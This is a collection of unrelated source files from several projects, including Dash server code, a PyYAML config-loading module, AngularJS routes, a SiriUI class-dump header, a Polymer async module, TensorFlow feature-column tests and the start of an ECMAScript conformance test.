os.path.commonprefix([self.config.assets_folder, filename])
).replace('\\', '/').lstrip('/')
_reload.changed_assets.append({
'url': self.get_asset_url(asset_path),
'modified': int(modified),
'is_css': filename.endswith('css')
})
if filename not in self._assets_files and not deleted:
res = self._add_assets_resource(asset_path, filename)
if filename.endswith('js'):
self.scripts.append_script(res)
elif filename.endswith('css'):
self.css.append_css(res)
if deleted:
if filename in self._assets_files:
self._assets_files.remove(filename)
def delete_resource(resources):
to_delete = None
for r in resources:
if r.get('asset_path') == asset_path:
to_delete = r
break
if to_delete:
resources.remove(to_delete)
if filename.endswith('js'):
# pylint: disable=protected-access
delete_resource(self.scripts._resources._resources)
elif filename.endswith('css'):
# pylint: disable=protected-access
delete_resource(self.css._resources._resources)
def run_server(
self,
port=8050,
debug=False,
dev_tools_ui=None,
dev_tools_props_check=None,
dev_tools_serve_dev_bundles=None,
dev_tools_hot_reload=None,
dev_tools_hot_reload_interval=None,
dev_tools_hot_reload_watch_interval=None,
dev_tools_hot_reload_max_retry=None,
dev_tools_silence_routes_logging=None,
**flask_run_options):
"""
Start the flask server in local mode, you should not run this on a
production server, use gunicorn/waitress instead.
If a parameter can be set by an environment variable, that is listed
too. Values provided here take precedence over environment variables.
:param port: Port used to serve the application
:type port: int
:param debug: Set Flask debug mode and enable dev tools.
env: ``DASH_DEBUG``
:type debug: bool
:param debug: Enable/disable all the dev tools unless overridden by the
arguments or environment variables. Default is ``True`` when
``enable_dev_tools`` is called directly, and ``False`` when called
via ``run_server``. env: ``DASH_DEBUG``
:type debug: bool
:param dev_tools_ui: Show the dev tools UI. env: ``DASH_UI``
:type dev_tools_ui: bool
:param dev_tools_props_check: Validate the types and values of Dash
component props. env: ``DASH_PROPS_CHECK``
:type dev_tools_props_check: bool
:param dev_tools_serve_dev_bundles: Serve the dev bundles. Production
bundles do not necessarily include all the dev tools code.
env: ``DASH_SERVE_DEV_BUNDLES``
:type dev_tools_serve_dev_bundles: bool
:param dev_tools_hot_reload: Activate hot reloading when app, assets,
and component files change. env: ``DASH_HOT_RELOAD``
:type dev_tools_hot_reload: bool
:param dev_tools_hot_reload_interval: Interval in seconds for the
client to request the reload hash. Default 3.
env: ``DASH_HOT_RELOAD_INTERVAL``
:type dev_tools_hot_reload_interval: float
:param dev_tools_hot_reload_watch_interval: Interval in seconds for the
server to check asset and component folders for changes.
Default 0.5. env: ``DASH_HOT_RELOAD_WATCH_INTERVAL``
:type dev_tools_hot_reload_watch_interval: float
:param dev_tools_hot_reload_max_retry: Maximum number of failed reload
hash requests before failing and displaying a pop up. Default 8.
env: ``DASH_HOT_RELOAD_MAX_RETRY``
:type dev_tools_hot_reload_max_retry: int
:param dev_tools_silence_routes_logging: Silence the `werkzeug` logger,
will remove all routes logging. Enabled with debugging by default
because hot reload hash checks generate a lot of requests.
env: ``DASH_SILENCE_ROUTES_LOGGING``
:type dev_tools_silence_routes_logging: bool
:param flask_run_options: Given to `Flask.run`
:return:
"""
debug = self.enable_dev_tools(
debug,
dev_tools_ui,
dev_tools_props_check,
dev_tools_serve_dev_bundles,
dev_tools_hot_reload,
dev_tools_hot_reload_interval,
dev_tools_hot_reload_watch_interval,
dev_tools_hot_reload_max_retry,
dev_tools_silence_routes_logging,
)
if self._dev_tools.silence_routes_logging:
# Since it's silenced, the address doesn't show anymore.
host = flask_run_options.get('host', '127.0.0.1')
ssl_context = flask_run_options.get('ssl_context')
self.logger.info(
'Running on %s://%s:%s%s',
'https' if ssl_context else 'http',
host, port, self.config.requests_pathname_prefix
)
# Generate a debugger pin and log it to the screen.
debugger_pin = os.environ['WERKZEUG_DEBUG_PIN'] = '-'.join(
itertools.chain(
''.join([str(random.randint(0, 9)) for _ in range(3)])
for _ in range(3))
)
self.logger.info('Debugger PIN: %s', debugger_pin)
self.server.run(port=port, debug=debug, **flask_run_options)
|
import yaml
from yaml.loader import Loader
import operator
from functools import reduce
from copy import deepcopy
from .py_utils import create_instance
try:
import torch
except ImportError:
torch = None
try:
import numpy as np
except ImportError:
np = None
def add(loader, node):
return sum(loader.construct_sequence(node))
def mul(loader, node):
return reduce(operator.mul, loader.construct_sequence(node))
def sub(loader, node):
return reduce(operator.sub, loader.construct_sequence(node))
def div(loader, node):
return reduce(operator.truediv, loader.construct_sequence(node))
def numpy_array(loader, node):
assert np is not None, "Numpy is not importable."
return np.array(loader.construct_sequence(node))
def torch_tensor(loader, node):
assert torch is not None, "Torch is not importable."
return torch.tensor(loader.construct_sequence(node))
def hyperopt(loader, node):
import pdb
pdb.set_trace()
yaml.add_constructor('!Add', add)
yaml.add_constructor('!Mul', mul)
yaml.add_constructor('!Sub', sub)
yaml.add_constructor('!Div', div)
yaml.add_constructor('!NumpyArray', numpy_array)
yaml.add_constructor('!TorchTensor', torch_tensor)
yaml.add_constructor('!Hyperopt', hyperopt)
class OverrideDict(dict):
"""class to allow overriding of whole dictionaries in recursive_update"""
def after_override(self):
return dict(self)
def override_constructor(loader, node):
if isinstance(node, yaml.MappingNode):
return OverrideDict(loader.construct_mapping(node))
else:
raise NotImplementedError('Node: ' + str(type(node)))
yaml.add_constructor('!Override', override_constructor)
class KeyDeleter:
"""class to allow deletion of dictionarly keys in recursive_update"""
pass
def key_delete_constructor(loader, node):
assert node.value == '', f'{node.value}'
return KeyDeleter()
yaml.add_constructor('!Del', key_delete_constructor)
def override_constructor(loader, node):
if isinstance(node, yaml.MappingNode):
return OverrideDict(loader.construct_mapping(node))
else:
raise NotImplementedError('Node: ' + str(type(node)))
def _recursive_update_inplace(d1, d2):
if isinstance(d2, OverrideDict):
# if requested, just override the whole dict d1
return d2.after_override()
for key, value in d2.items():
if isinstance(value, KeyDeleter) or value == "KeyDeleter":
# delete the key in d1 if requested
if key in d1:
del d1[key]
elif key in d1 and isinstance(d1[key], dict) and isinstance(value, dict):
# if the key is present in both dicts, and both values are dicts, update recursively
d1[key] = _recursive_update_inplace(d1[key], value)
else:
# otherwise, just assign the value
d1[key] = value
return d1
def recursive_update(d1, d2):
"""
Update d1 with the data from d2 recursively
:param d1: dict
:param d2: dict
:return: dict
"""
# make sure there are no side effects
d1 = deepcopy(d1)
d2 = deepcopy(d2)
return _recursive_update_inplace(d1, d2)
class TempArgObj:
def __init__(self, value, tag, style):
self.value = value
self.tag = tag
self.style = style
@staticmethod
def to_yaml(dumper, data):
return dumper.represent_scalar(f'!Obj:{data.tag}', data.value, style=data.style)
class TempArgsObj(list):
def __init__(self, value, tag, flow_style):
super(TempArgsObj, self).__init__(value)
self.tag = tag
self.flow_style = flow_style
@staticmethod
def to_yaml(dumper, data):
return dumper.represent_sequence(f'!Obj:{data.tag}', data, flow_style=data.flow_style)
class TempKwargsObj(dict):
def __init__(self, mapping, tag, flow_style):
super(TempKwargsObj, self).__init__(mapping)
# save tag (which is the class to be constructed) in the dict to allow updating
self['__tag__'] = tag
self.flow_style = flow_style
@staticmethod
def to_yaml(dumper, data):
tag = data.pop('__tag__')
return dumper.represent_mapping(f'!Obj:{tag}', data, flow_style=data.flow_style)
def temp_obj_constructor(loader, tag_suffix, node):
if isinstance(node, yaml.ScalarNode):
return TempArgObj(loader.construct_scalar(node), tag_suffix, style=node.style)
elif isinstance(node, yaml.SequenceNode):
return TempArgsObj(loader.construct_sequence(node), tag_suffix, flow_style=node.flow_style)
elif isinstance(node, yaml.MappingNode):
return TempKwargsObj(loader.construct_mapping(node), tag_suffix, flow_style=node.flow_style)
else:
raise NotImplementedError('Node: ' + str(type(node)))
yaml.add_multi_constructor('!Obj:', temp_obj_constructor)
yaml.add_representer(TempArgObj, TempArgObj.to_yaml)
yaml.add_representer(TempArgsObj, TempArgsObj.to_yaml)
yaml.add_representer(TempKwargsObj, TempKwargsObj.to_yaml)
class TempKwargsOverrideObj(TempKwargsObj, OverrideDict):
def after_override(self):
tag = self.pop('__tag__')
return TempKwargsObj(mapping=dict(self), tag=tag, flow_style=self.flow_style)
def temp_override_obj_constructor(loader, tag_suffix, node):
if isinstance(node, yaml.ScalarNode):
return TempArgObj(loader.construct_scalar(node), tag_suffix, style=node.style)
elif isinstance(node, yaml.SequenceNode):
return TempArgsObj(loader.construct_sequence(node), tag_suffix, flow_style=node.flow_style)
elif isinstance(node, yaml.MappingNode):
return TempKwargsOverrideObj(loader.construct_mapping(node), tag_suffix, flow_style=node.flow_style)
else:
raise NotImplementedError('Node: ' + str(type(node)))
yaml.add_multi_constructor('!OverrideObj:', temp_override_obj_constructor)
class ObjectLoader(Loader):
"""
Loader for python object construction
Examples:
"""
def construct_instance(self, suffix, node):
if isinstance(node, yaml.MappingNode): # keyword arguments specified
class_dict = self.construct_mapping(node, deep=True)
elif isinstance(node, yaml.SequenceNode): # positional arguments specified
class_dict = dict(args=self.construct_sequence(node, deep=True))
elif isinstance(node, yaml.ScalarNode): # only one argument specified as scalar
class_dict = dict(args=[self.construct_scalar(node)])
else:
raise NotImplementedError
return create_instance({suffix: class_dict})
# add the python object constructor to the loader
ObjectLoader.add_multi_constructor('!Obj:', ObjectLoader.construct_instance)
|
var myApp = angular.module("loginApp" , ["ngRoute" , "firebase"]);
myApp.config(["$routeProvider" , "$locationProvider" , function($routeProvider , $locationProvider){
$routeProvider.when("/login" , {
templateUrl : "/views/login.html",
controller : "registerCtr"
}).
when("/register" , {
templateUrl : "/views/register.html",
controller : "registerCtr"
}).
when("/success",{
templateUrl : "/views/success.html",
controller : "successCtr"
}).
when("/home" , {
templateUrl : "/views/home.html"
}).otherwise({
redirectTo:"/login"
});
}]); |
def swap(arr):
for i in range(0,len(arr)-1,2):
print(i, end=" ") # current
print(i+1) # next
temp = arr[i]
arr[i] = arr[i+1]
arr[i+1] = temp
def swapAlternative(arr, n):
for i in range(n):
if (i+1 < n):
swap(arr)
def printArray(arr, n):
for i in range(n):
print(arr[i])
arr = [1,3,5,4,6,7]
# brr = [4,5,7,8,5]
swapAlternative(arr, 6)
# reverse(arr, 5)
printArray(arr, 6) |
/*
* This header is generated by classdump-dyld 1.5
* on Wednesday, April 14, 2021 at 2:29:02 PM Mountain Standard Time
* Operating System: Version 14.4 (Build 18K802)
* Image Source: /System/Library/PrivateFrameworks/SiriUI.framework/SiriUI
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. Updated by Kevin Bradley.
*/
@class AceObject;
@protocol SiriUIViewController <NSObject>
@property (nonatomic,retain) AceObject * aceObject;
@property (assign,getter=isUtteranceUserInteractionEnabled,nonatomic) BOOL utteranceUserInteractionEnabled;
@optional
-(double)baselineOffsetFromBottom;
-(id)navigationTitle;
-(double)desiredHeightForWidth:(double)arg1;
-(double)desiredHeight;
-(void)endEditingAndCorrect:(BOOL)arg1;
-(void)endEditingAndCorrectByTouchPoint:(CGPoint)arg1;
-(void)handleAceCommand:(id)arg1;
-(void)siriWillBeginScrolling;
-(void)siriDidScrollVisible:(BOOL)arg1;
-(double)desiredTopPaddingBelowController:(id)arg1;
-(double)desiredPinnedTopPadding;
-(void)siriDidStartSpeakingWithIdentifier:(id)arg1;
-(void)siriDidStopSpeakingWithIdentifier:(id)arg1 speechQueueIsEmpty:(BOOL)arg2;
-(BOOL)shouldHidePriorViews;
-(void)siriDidReceiveViewsWithDialogPhase:(id)arg1;
@required
-(AceObject *)aceObject;
-(void)setAceObject:(id)arg1;
-(void)siriWillActivateFromSource:(long long)arg1;
-(void)siriDidDeactivate;
-(void)wasAddedToTranscript;
-(BOOL)isUtteranceUserInteractionEnabled;
-(void)setUtteranceUserInteractionEnabled:(BOOL)arg1;
@end
|
import"./boot.js";let microtaskCurrHandle=0,microtaskLastHandle=0,microtaskCallbacks=[],microtaskNodeContent=0,microtaskNode=document.createTextNode("");new window.MutationObserver(microtaskFlush).observe(microtaskNode,{characterData:!0});function microtaskFlush(){const len=microtaskCallbacks.length;for(let i=0,cb;i<len;i++){cb=microtaskCallbacks[i];if(cb){try{cb()}catch(e){setTimeout(()=>{throw e})}}}microtaskCallbacks.splice(0,len);microtaskLastHandle+=len}const timeOut={after(delay){return{run(fn){return window.setTimeout(fn,delay)},cancel(handle){window.clearTimeout(handle)}}},run(fn,delay){return window.setTimeout(fn,delay)},cancel(handle){window.clearTimeout(handle)}};export{timeOut};const animationFrame={run(fn){return window.requestAnimationFrame(fn)},cancel(handle){window.cancelAnimationFrame(handle)}};export{animationFrame};const idlePeriod={run(fn){return window.requestIdleCallback?window.requestIdleCallback(fn):window.setTimeout(fn,16)},cancel(handle){window.cancelIdleCallback?window.cancelIdleCallback(handle):window.clearTimeout(handle)}};export{idlePeriod};const microTask={run(callback){microtaskNode.textContent=microtaskNodeContent++;microtaskCallbacks.push(callback);return microtaskCurrHandle++},cancel(handle){const idx=handle-microtaskLastHandle;if(0<=idx){if(!microtaskCallbacks[idx]){throw new Error("invalid async handle: "+handle)}microtaskCallbacks[idx]=null}}};export{microTask}; |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.feature_column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
class FeatureColumnTest(tf.test.TestCase):
def testImmutability(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
with self.assertRaises(AttributeError):
a.column_name = "bbb"
def testSparseColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
self.assertEqual(a.name, "aaa")
def testWeightedSparseColumn(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
self.assertEqual(weighted_ids.name, "ids_weighted_by_weights")
def testEmbeddingColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100,
combiner="sum")
b = tf.contrib.layers.embedding_column(a, dimension=4, combiner="mean")
self.assertEqual(b.sparse_id_column.name, "aaa")
self.assertEqual(b.dimension, 4)
self.assertEqual(b.combiner, "mean")
def testRealValuedColumn(self):
a = tf.contrib.layers.real_valued_column("aaa")
self.assertEqual(a.name, "aaa")
self.assertEqual(a.dimension, 1)
b = tf.contrib.layers.real_valued_column("bbb", 10)
self.assertEqual(b.dimension, 10)
self.assertTrue(b.default_value is None)
with self.assertRaisesRegexp(TypeError, "dimension must be an integer"):
tf.contrib.layers.real_valued_column("d3", dimension=1.0)
with self.assertRaisesRegexp(ValueError,
"dimension must be greater than 0"):
tf.contrib.layers.real_valued_column("d3", dimension=0)
with self.assertRaisesRegexp(ValueError,
"dtype must be convertible to float"):
tf.contrib.layers.real_valued_column("d3", dtype=tf.string)
# default_value is an integer.
c1 = tf.contrib.layers.real_valued_column("c1", default_value=2)
self.assertListEqual(list(c1.default_value), [2.])
c2 = tf.contrib.layers.real_valued_column("c2",
default_value=2,
dtype=tf.int32)
self.assertListEqual(list(c2.default_value), [2])
c3 = tf.contrib.layers.real_valued_column("c3",
dimension=4,
default_value=2)
self.assertListEqual(list(c3.default_value), [2, 2, 2, 2])
c4 = tf.contrib.layers.real_valued_column("c4",
dimension=4,
default_value=2,
dtype=tf.int32)
self.assertListEqual(list(c4.default_value), [2, 2, 2, 2])
# default_value is a float.
d1 = tf.contrib.layers.real_valued_column("d1", default_value=2.)
self.assertListEqual(list(d1.default_value), [2.])
d2 = tf.contrib.layers.real_valued_column("d2",
dimension=4,
default_value=2.)
self.assertListEqual(list(d2.default_value), [2., 2., 2., 2.])
with self.assertRaisesRegexp(TypeError,
"default_value must be compatible with dtype"):
tf.contrib.layers.real_valued_column("d3",
default_value=2.,
dtype=tf.int32)
# default_value is neither integer nor float.
with self.assertRaisesRegexp(
TypeError, "default_value must be compatible with dtype"):
tf.contrib.layers.real_valued_column("e1", default_value="string")
with self.assertRaisesRegexp(
TypeError, "default_value must be compatible with dtype"):
tf.contrib.layers.real_valued_column("e1",
dimension=3,
default_value=[1, 3., "string"])
# default_value is a list of integers.
f1 = tf.contrib.layers.real_valued_column("f1", default_value=[2])
self.assertListEqual(list(f1.default_value), [2])
f2 = tf.contrib.layers.real_valued_column("f2",
dimension=3,
default_value=[2, 2, 2])
self.assertListEqual(list(f2.default_value), [2., 2., 2.])
f3 = tf.contrib.layers.real_valued_column("f3",
dimension=3,
default_value=[2, 2, 2],
dtype=tf.int32)
self.assertListEqual(list(f3.default_value), [2, 2, 2])
# default_value is a list of floats.
g1 = tf.contrib.layers.real_valued_column("g1", default_value=[2.])
self.assertListEqual(list(g1.default_value), [2.])
g2 = tf.contrib.layers.real_valued_column("g2",
dimension=3,
default_value=[2., 2, 2])
self.assertListEqual(list(g2.default_value), [2., 2., 2.])
with self.assertRaisesRegexp(
TypeError, "default_value must be compatible with dtype"):
tf.contrib.layers.real_valued_column("g3",
default_value=[2.],
dtype=tf.int32)
with self.assertRaisesRegexp(
ValueError, "The length of default_value must be equal to dimension"):
tf.contrib.layers.real_valued_column("g4",
dimension=3,
default_value=[2.])
# Test that the normalizer_fn gets stored for a real_valued_column
normalizer = lambda x: x - 1
h1 = tf.contrib.layers.real_valued_column("h1", normalizer=normalizer)
self.assertEqual(normalizer(10), h1.normalizer_fn(10))
def testBucketizedColumnNameEndsWithUnderscoreBucketized(self):
a = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("aaa"), [0, 4])
self.assertEqual(a.name, "aaa_bucketized")
def testBucketizedColumnRequiresRealValuedColumn(self):
with self.assertRaisesRegexp(
TypeError, "source_column must be an instance of _RealValuedColumn"):
tf.contrib.layers.bucketized_column("bbb", [0])
with self.assertRaisesRegexp(
TypeError, "source_column must be an instance of _RealValuedColumn"):
tf.contrib.layers.bucketized_column(
tf.contrib.layers.sparse_column_with_integerized_feature(
column_name="bbb", bucket_size=10),
[0])
def testBucketizedColumnRequiresSortedBuckets(self):
with self.assertRaisesRegexp(
ValueError, "boundaries must be a sorted list"):
tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("ccc"), [5, 0, 4])
def testBucketizedColumnWithSameBucketBoundaries(self):
a_bucketized = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("a"), [1., 2., 2., 3., 3.])
self.assertEqual(a_bucketized.name, "a_bucketized")
self.assertTupleEqual(a_bucketized.boundaries, (1., 2., 3.))
def testCrossedColumnNameCreatesSortedNames(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("cost"), [0, 4])
crossed = tf.contrib.layers.crossed_column(
set([b, bucket, a]), hash_bucket_size=10000)
self.assertEqual("aaa_X_bbb_X_cost_bucketized", crossed.name,
"name should be generated by sorted column names")
self.assertEqual("aaa", crossed.columns[0].name)
self.assertEqual("bbb", crossed.columns[1].name)
self.assertEqual("cost_bucketized", crossed.columns[2].name)
def testCrossedColumnNotSupportRealValuedColumn(self):
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
with self.assertRaisesRegexp(
TypeError,
"columns must be a set of _SparseColumn, _CrossedColumn, "
"or _BucketizedColumn instances"):
tf.contrib.layers.crossed_column(
set([b, tf.contrib.layers.real_valued_column("real")]),
hash_bucket_size=10000)
def testWeightedSparseColumnDtypes(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
self.assertDictEqual(
{"ids": tf.VarLenFeature(tf.string),
"weights": tf.VarLenFeature(tf.float32)},
weighted_ids.config)
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights",
dtype=tf.int32)
self.assertDictEqual(
{"ids": tf.VarLenFeature(tf.string),
"weights": tf.VarLenFeature(tf.int32)},
weighted_ids.config)
with self.assertRaisesRegexp(ValueError,
"dtype is not convertible to float"):
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights",
dtype=tf.string)
def testRealValuedColumnDtypes(self):
rvc = tf.contrib.layers.real_valued_column("rvc")
self.assertDictEqual(
{"rvc": tf.FixedLenFeature(
[1], dtype=tf.float32)},
rvc.config)
rvc = tf.contrib.layers.real_valued_column("rvc", dtype=tf.int32)
self.assertDictEqual(
{"rvc": tf.FixedLenFeature(
[1], dtype=tf.int32)},
rvc.config)
with self.assertRaisesRegexp(ValueError,
"dtype must be convertible to float"):
tf.contrib.layers.real_valued_column("rvc", dtype=tf.string)
def testSparseColumnDtypes(self):
sc = tf.contrib.layers.sparse_column_with_integerized_feature("sc", 10)
self.assertDictEqual({"sc": tf.VarLenFeature(dtype=tf.int64)}, sc.config)
sc = tf.contrib.layers.sparse_column_with_integerized_feature(
"sc", 10, dtype=tf.int32)
self.assertDictEqual({"sc": tf.VarLenFeature(dtype=tf.int32)}, sc.config)
with self.assertRaisesRegexp(ValueError,
"dtype must be an integer"):
tf.contrib.layers.sparse_column_with_integerized_feature("sc",
10,
dtype=tf.float32)
def testCreateFeatureSpec(self):
sparse_col = tf.contrib.layers.sparse_column_with_hash_bucket(
"sparse_column", hash_bucket_size=100)
embedding_col = tf.contrib.layers.embedding_column(
tf.contrib.layers.sparse_column_with_hash_bucket(
"sparse_column_for_embedding",
hash_bucket_size=10),
dimension=4)
sparse_id_col = tf.contrib.layers.sparse_column_with_keys(
"id_column", ["marlo", "omar", "stringer"])
weighted_id_col = tf.contrib.layers.weighted_sparse_column(
sparse_id_col, "id_weights_column")
real_valued_col1 = tf.contrib.layers.real_valued_column(
"real_valued_column1")
real_valued_col2 = tf.contrib.layers.real_valued_column(
"real_valued_column2", 5)
bucketized_col1 = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column(
"real_valued_column_for_bucketization1"), [0, 4])
bucketized_col2 = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column(
"real_valued_column_for_bucketization2", 4), [0, 4])
a = tf.contrib.layers.sparse_column_with_hash_bucket("cross_aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("cross_bbb",
hash_bucket_size=100)
cross_col = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
feature_columns = set([sparse_col, embedding_col, weighted_id_col,
real_valued_col1, real_valued_col2,
bucketized_col1, bucketized_col2,
cross_col])
config = tf.contrib.layers.create_feature_spec_for_parsing(feature_columns)
self.assertDictEqual({
"sparse_column": tf.VarLenFeature(tf.string),
"sparse_column_for_embedding": tf.VarLenFeature(tf.string),
"id_column": tf.VarLenFeature(tf.string),
"id_weights_column": tf.VarLenFeature(tf.float32),
"real_valued_column1": tf.FixedLenFeature([1], dtype=tf.float32),
"real_valued_column2": tf.FixedLenFeature([5], dtype=tf.float32),
"real_valued_column_for_bucketization1":
tf.FixedLenFeature([1], dtype=tf.float32),
"real_valued_column_for_bucketization2":
tf.FixedLenFeature([4], dtype=tf.float32),
"cross_aaa": tf.VarLenFeature(tf.string),
"cross_bbb": tf.VarLenFeature(tf.string)}, config)
def testCreateFeatureSpec_RealValuedColumnWithDefaultValue(self):
real_valued_col1 = tf.contrib.layers.real_valued_column(
"real_valued_column1", default_value=2)
real_valued_col2 = tf.contrib.layers.real_valued_column(
"real_valued_column2", 5, default_value=4)
real_valued_col3 = tf.contrib.layers.real_valued_column(
"real_valued_column3", default_value=[8])
real_valued_col4 = tf.contrib.layers.real_valued_column(
"real_valued_column4", 3,
default_value=[1, 0, 6])
feature_columns = [real_valued_col1, real_valued_col2,
real_valued_col3, real_valued_col4]
config = tf.contrib.layers.create_feature_spec_for_parsing(feature_columns)
self.assertEqual(4, len(config))
self.assertDictEqual({
"real_valued_column1":
tf.FixedLenFeature([1], dtype=tf.float32, default_value=[2.]),
"real_valued_column2":
tf.FixedLenFeature([5], dtype=tf.float32,
default_value=[4., 4., 4., 4., 4.]),
"real_valued_column3":
tf.FixedLenFeature([1], dtype=tf.float32, default_value=[8.]),
"real_valued_column4":
tf.FixedLenFeature([3], dtype=tf.float32,
default_value=[1., 0., 6.])}, config)
def testMakePlaceHolderTensorsForBaseFeatures(self):
sparse_col = tf.contrib.layers.sparse_column_with_hash_bucket(
"sparse_column", hash_bucket_size=100)
real_valued_col = tf.contrib.layers.real_valued_column("real_valued_column",
5)
bucketized_col = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column(
"real_valued_column_for_bucketization"), [0, 4])
feature_columns = set([sparse_col, real_valued_col, bucketized_col])
placeholders = (
tf.contrib.layers.make_place_holder_tensors_for_base_features(
feature_columns))
self.assertEqual(3, len(placeholders))
self.assertTrue(isinstance(placeholders["sparse_column"],
tf.SparseTensor))
placeholder = placeholders["real_valued_column"]
self.assertGreaterEqual(
placeholder.name.find(u"Placeholder_real_valued_column"), 0)
self.assertEqual(tf.float32, placeholder.dtype)
self.assertEqual([None, 5], placeholder.get_shape().as_list())
placeholder = placeholders["real_valued_column_for_bucketization"]
self.assertGreaterEqual(
placeholder.name.find(
u"Placeholder_real_valued_column_for_bucketization"), 0)
self.assertEqual(tf.float32, placeholder.dtype)
self.assertEqual([None, 1], placeholder.get_shape().as_list())
def testInitEmbeddingColumnWeightsFromCkpt(self):
sparse_col = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="object_in_image",
hash_bucket_size=4)
# Create _EmbeddingColumn which randomly initializes embedding of size
# [4, 16].
embedding_col = tf.contrib.layers.embedding_column(sparse_col, dimension=16)
# Creating a SparseTensor which has all the ids possible for the given
# vocab.
input_tensor = tf.SparseTensor(indices=[[0, 0], [1, 1], [2, 2], [3, 3]],
values=[0, 1, 2, 3],
shape=[4, 4])
# Invoking 'embedding_column.to_dnn_input_layer' will create the embedding
# variable. Creating under scope 'run_1' so as to prevent name conflicts
# when creating embedding variable for 'embedding_column_pretrained'.
with tf.variable_scope("run_1"):
with tf.variable_scope(embedding_col.name):
# This will return a [4, 16] tensor which is same as embedding variable.
embeddings = embedding_col.to_dnn_input_layer(input_tensor)
save = tf.train.Saver()
checkpoint_path = os.path.join(self.get_temp_dir(), "model.ckpt")
with self.test_session() as sess:
sess.run(tf.initialize_all_variables())
saved_embedding = embeddings.eval()
save.save(sess, checkpoint_path)
embedding_col_initialized = tf.contrib.layers.embedding_column(
sparse_id_column=sparse_col,
dimension=16,
ckpt_to_load_from=checkpoint_path,
tensor_name_in_ckpt="run_1/object_in_image_embedding/weights")
with tf.variable_scope("run_2"):
# This will initialize the embedding from provided checkpoint and return a
# [4, 16] tensor which is same as embedding variable. Since we didn't
# modify embeddings, this should be same as 'saved_embedding'.
pretrained_embeddings = embedding_col_initialized.to_dnn_input_layer(
input_tensor)
with self.test_session() as sess:
sess.run(tf.initialize_all_variables())
loaded_embedding = pretrained_embeddings.eval()
self.assertAllClose(saved_embedding, loaded_embedding)
def testInitCrossedColumnWeightsFromCkpt(self):
sparse_col_1 = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="col_1", hash_bucket_size=4)
sparse_col_2 = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="col_2", hash_bucket_size=4)
crossed_col = tf.contrib.layers.crossed_column(
columns=[sparse_col_1, sparse_col_2],
hash_bucket_size=4)
input_tensor = tf.SparseTensor(indices=[[0, 0], [1, 1], [2, 2], [3, 3]],
values=[0, 1, 2, 3],
shape=[4, 4])
# Invoking 'crossed_col.to_weighted_sum' will create the crossed column
# weights variable.
with tf.variable_scope("run_1"):
with tf.variable_scope(crossed_col.name):
# Returns looked up column weights which is same as crossed column
# weights as well as actual references to weights variables.
col_weights, weights = crossed_col.to_weighted_sum(input_tensor)
# Update the weights since default initializer initializes all weights
# to 0.0.
for weight in weights:
assign_op = tf.assign(weight, weight + 0.5)
save = tf.train.Saver()
checkpoint_path = os.path.join(self.get_temp_dir(), "model.ckpt")
with self.test_session() as sess:
sess.run(tf.initialize_all_variables())
sess.run(assign_op)
saved_col_weights = col_weights.eval()
save.save(sess, checkpoint_path)
crossed_col_initialized = tf.contrib.layers.crossed_column(
columns=[sparse_col_1, sparse_col_2],
hash_bucket_size=4,
ckpt_to_load_from=checkpoint_path,
tensor_name_in_ckpt="run_1/col_1_X_col_2/weights")
with tf.variable_scope("run_2"):
# This will initialize the crossed column weights from provided checkpoint
# and return a [4, 1] tensor which is same as weights variable. Since we
# won't modify weights, this should be same as 'saved_col_weights'.
col_weights_from_ckpt, _ = crossed_col_initialized.to_weighted_sum(
input_tensor)
with self.test_session() as sess:
sess.run(tf.initialize_all_variables())
loaded_col_weights = col_weights_from_ckpt.eval()
self.assertAllClose(saved_col_weights, loaded_col_weights)
if __name__ == "__main__":
tf.test.main()
|
// Copyright (c) 2012 Ecma International. All rights reserved.
// Ecma International makes this code available under the terms and conditions set
// forth on http://hg.ecmascript.org/tests/test262/raw-file/tip/LICENSE (the
// "Use Terms"). Any redistribution of this code must retain the above
// copyright and this notice and otherwise comply with the Use Terms.
/*---
es5id: 15.2.3.7-6-a-245
description: >
Object.defineProperties - TypeError is thrown if 'O' is an Array,
'P' is an array index named property that already exists on 'O' is
accessor property with [[Configurable]] false, 'desc' is accessor
descriptor, the [[Get]] field of 'desc' is present, and the
[[Get]] field of 'desc' is an object and the [[Get]] attribute
value of 'P' is undefined (15.4.5.1 step 4.c)
includes: [propertyHelper.js]
---*/
var arr = [];
function get_fun() {
return 36;
}
Object.defineProperty(arr, "1", {
